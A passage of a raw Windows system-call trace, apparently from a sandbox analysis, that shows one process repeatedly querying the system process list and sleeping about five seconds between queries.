BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.493] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.540] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.556] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.571] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.602] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.633] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.650] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.665] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.682] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.713] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.729] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.743] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.762] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.774] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.903] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 